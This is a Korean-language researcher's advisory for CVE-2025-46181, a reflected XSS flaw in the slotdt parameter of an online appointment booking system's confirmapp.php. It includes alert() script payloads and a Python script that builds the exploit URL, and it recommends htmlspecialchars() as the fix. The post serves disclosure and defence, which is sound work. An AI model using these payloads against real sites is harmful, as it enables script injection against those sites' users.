
CVE-ID: CVE-2025-46181
발견자: Shemkumar P (shemkumar.github.io)
취약점 유형: 반사형 교차 사이트 스크립팅(Reflected XSS)
심각도: 중간(Medium)
상태: 공개됨, MITRE에서 CVE 지정
공개 온라인 예약 시스템(v1.0)의 예약 확인(confirmation)을 처리하는 페이지에서 반사형 교차 사이트 스크립팅(Reflected XSS) 취약점이 발견되었습니다. GET 매개변수가 입력값을 제대로 살균(sanitize)하지 않아 희생자의 브라우저에서 JavaScript 주입 및 코드 실행이 가능합니다.
GET /confirmapp.php?slotdt=<payload>
예제 페이로드(인코딩됨):
<script>alert("XSS")</script>
<script>alert("You have been hijacked")</script>
🚫 윤리적 이유로 실제 링크는 삭제되었습니다. 이 취약점은 통제된 환경에서 테스트되었습니다.
import requests
from urllib.parse import quote
base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'
params = {
'fullname': 'test',
'mobile': '9999999999',
'emailid': '[email protected]',
'slotdt': payload,
'slottime': '11:00:00',
'doctorid': '2'
}
encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")
애플리케이션은 다음을 수행해야 합니다:
htmlspecialchars()를 사용하여 사용자 입력을 이스케이프합니다Shemkumar P
🕸️ shemkumar.github.io
🔐 사이버 보안 연구원 | CTF 애호가 | CVE 보고자
⚠️ 이 게시물은 교육 및 방어 목적으로만 제공됩니다. 소유하지 않았거나 명시적 허가를 받지 않은 시스템의 취약점을 테스트하거나 악용하는 것은 불법적이며 비윤리적입니다.